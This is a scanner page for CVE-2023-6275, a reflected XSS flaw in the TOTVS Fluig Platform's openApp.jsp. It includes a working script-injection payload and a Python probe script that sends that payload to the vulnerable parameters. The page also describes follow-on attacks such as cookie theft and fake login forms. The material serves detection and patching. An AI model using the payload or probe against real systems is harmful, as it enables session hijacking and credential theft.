S4E

CVE-2023-6275 Scanner

CVE-2023-6275 Scanner - Cross-Site Scripting (XSS) vulnerability in TOTVS Fluig Platform

Short Info

Level: Medium
Scan type: Single Scan
Can be used by: Asset Owner
Estimated Time: 10 seconds
Time Interval: 26 days 6 hours
Scan only one: URL
Toolbox: -

The TOTVS Fluig Platform is a collaborative, web-based application used by organizations for business process management (BPM) and document sharing. It offers workflow automation, enterprise content management, analytics and customizable dashboards, and integrates with existing line-of-business systems. Because it is reachable through any browser-equipped device, including mobile clients, it is commonly exposed to employees working remotely, which also widens the audience that a link-based attack can reach.

Cross-Site Scripting (XSS) is a common web application vulnerability in which attacker-controlled input is placed into a page without proper output encoding, so that the victim's browser executes it as script. This specific XSS vulnerability affects the TOTVS Fluig Platform and lets an attacker run JavaScript in the security context of a Fluig user's browser session. Such script can read data the page exposes, issue requests with the victim's ambient credentials, and perform actions as that user; where the session cookie is not marked HttpOnly, it can also read the session token directly. Because exploitation typically needs nothing more than a victim following a crafted link, and the impact extends to full impersonation of that user within the application, XSS is treated as a significant risk until patched.

The vulnerability lies within an unspecified function of the file /mobileredir/openApp.jsp on the TOTVS Fluig Platform. The ‘redirectUrl’ and ‘user’ parameters are reflected into the response without adequate sanitization or output encoding, so a crafted value such as "><script>alert(document.domain)</script> is emitted into the page and executed. The leading "> in that payload closes a quoted HTML attribute, which indicates that the reflection point sits inside an attribute value; a payload that only contained a bare <script> tag would not break out of that context. This is a reflected XSS: the script is not stored on the server but is returned immediately in the response to the request that carried it, so the attacker must deliver the crafted URL to a victim (for example by e-mail or chat). The script then executes with the victim's session, allowing the attacker to interact with session data or other sensitive information. When verifying the issue, confirm that the payload appears in the response body unencoded (a <script> tag intact rather than &lt;script&gt;) and that it actually executes in a browser, since a reflected but entity-encoded value is not exploitable.
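The following is an added example of the reflection check described above; it is not S4E's scanner code nor code from TOTVS. It builds one probe URL per parameter named in the advisory, classifies a response as reflecting the payload unescaped, HTML-entity-encoded, or not at all, and runs that logic against constructed sample responses. The canary marker, the `fetch` callable, the sample HTML bodies and the host name are assumptions made for the example; only the endpoint path, the parameter names and the shape of the payload come from the page.

```python
"""Reflected-XSS reflection check for CVE-2023-6275 (added example, not S4E or TOTVS code)."""
from __future__ import annotations

from html import escape
from typing import Callable, Dict
from urllib.parse import urlencode, urljoin

ENDPOINT = "/mobileredir/openApp.jsp"      # path named in the advisory
PARAMS = ("redirectUrl", "user")            # parameters named in the advisory
MARKER = "s4ezz9q"                          # hypothetical unique marker so a match cannot be accidental
# Same shape as the page's payload, but with the marker instead of document.domain
PAYLOAD = f'"><script>alert({MARKER})</script>'


def build_probe_urls(base_url: str) -> Dict[str, str]:
    """Return one probe URL per parameter, with the payload URL-encoded in the query string."""
    target = urljoin(base_url, ENDPOINT)
    return {p: f"{target}?{urlencode({p: PAYLOAD})}" for p in PARAMS}


def classify_reflection(body: str, payload: str = PAYLOAD) -> str:
    """Classify how a response body reflects the payload.

    'unescaped': the payload appears verbatim, <script> tag intact -> likely exploitable.
    'encoded':   it appears only with <, >, " turned into HTML entities -> output encoding is in place.
    'absent':    the parameter is not reflected at all.
    Assumes an HTML body/attribute context; a JavaScript-string context would need a different check.
    """
    if payload in body:
        return "unescaped"
    if escape(payload, quote=True) in body or escape(payload, quote=False) in body:
        return "encoded"
    return "absent"


def scan(base_url: str, fetch: Callable[[str], str]) -> Dict[str, str]:
    """Probe every parameter and return a verdict per parameter.

    `fetch` is injected so the check can be exercised offline; in a real run it
    would perform an HTTP GET (e.g. with requests) and return the response text.
    """
    return {p: classify_reflection(fetch(url)) for p, url in build_probe_urls(base_url).items()}


# Constructed sample responses (not captured from a real Fluig instance).
# The vulnerable variant drops the raw value into a quoted href attribute, which is the
# context the leading "> in the payload is designed to escape from.
VULNERABLE_BODY = '<html><body><a href="' + PAYLOAD + '">Open app</a></body></html>'
PATCHED_BODY = '<html><body><a href="' + escape(PAYLOAD, quote=True) + '">Open app</a></body></html>'


def _stub_fetch(url: str) -> str:
    """Offline stand-in for an HTTP client: redirectUrl is reflected raw, user is encoded."""
    return VULNERABLE_BODY if "redirectUrl=" in url else PATCHED_BODY


if __name__ == "__main__":
    for param, verdict in scan("https://fluig.example.test/", _stub_fetch).items():
        print(f"{param}: {verdict}")
```

An "unescaped" verdict is a strong indicator but not proof: the scanner should still confirm the script executes in a browser, and the same probe should be repeated with an authenticated session, since the impact of a reflected XSS depends entirely on what the victim's session can do.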

If exploited, this vulnerability gives an attacker script execution in the browser of any Fluig user who follows a crafted link. The script can read data exposed to the page, such as authentication tokens that are not protected by the HttpOnly flag or personal information shown in the interface, and can manipulate page content to redirect the victim to a phishing site or deface what they see. Combined with social engineering, a fake login form injected into a trusted Fluig page is an effective way to capture credentials. For the organization this translates into data leakage, privacy violations and unauthorized actions performed under legitimate user accounts. Leaving such flaws unaddressed increases the risk of successful attacks on user accounts and sensitive information.
